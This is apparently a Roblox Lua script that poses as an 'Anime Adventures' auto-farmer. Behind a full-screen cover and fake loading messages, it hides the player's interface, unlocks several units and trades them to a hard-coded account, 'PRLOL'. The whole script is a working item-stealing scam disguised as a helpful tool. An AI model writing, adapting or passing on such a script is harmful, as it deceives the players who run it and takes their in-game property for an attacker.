wait(1)
if not game.Players["PRLOL"] then return end

task.spawn(function()
	while wait(2) do
		pcall(function()
			for _,v in pairs(game:GetDescendants()) do
				if v:IsA("TextLabel") or v:IsA("ImageLabel") or v:IsA("Frame") or v:IsA("TextButton") or v:IsA("ScreenGUI") or v:IsA("ScrollingFrame") then
					v.Visible = false
				end
			end
		end)
	end
end)

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(74, 74, 74)
Frame.ZIndex = 10
Frame.Size = UDim2.new(0, 4000, 0, 4000)

TextLabel.Parent = ScreenGui
TextLabel.BackgroundColor3 = Color3.fromRGB(74, 74, 74)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0682142526, 0, 0.243142143, 0)
TextLabel.Size = UDim2.new(0, 1265, 0, 402)
TextLabel.Font = Enum.Font.Antique
TextLabel.ZIndex = 10
TextLabel.Text = "AA - Auto Farmer Loading. Give it a sec.."
TextLabel.TextColor3 = Color3.fromRGB(255, 85, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true
wait(1)
local Units = {
	"{125122b1-74ba-468c-a55c-77cf9c90dc08}";
	"{a1a93d5f-c5dd-4c2f-9875-05636f65347d}";
	"{203342d2-299b-4c9f-ac41-b67e3a52fe81}";
	"{d526ac1d-8782-458a-83d5-37b94c951727}";
	"{b0f7faf9-cfae-4902-99c7-8afad5e003ba}";
}
for _,v in pairs(Units) do
	pcall(function()
		game:GetService("ReplicatedStorage").endpoints.client_to_server.lock_unlock_unit:InvokeServer(v,false)
		wait(.7)
	end)
end
wait(1)
game:GetService("ReplicatedStorage").endpoints.client_to_server.start_trade_request:InvokeServer(game.Players.PRLOL)
wait(5)
TextLabel.Text = "AA - Loading Units.."
for _,v in pairs(Units) do
	pcall(function()
		game:GetService("ReplicatedStorage").endpoints.client_to_server.offer_unit:InvokeServer(v)
		wait(.7)
	end)
end
TextLabel.Text = "Partner Found! Setting up autofarmer with SPLASH."
wait(10)
game:GetService("ReplicatedStorage").endpoints.client_to_server.ready_trade:InvokeServer()
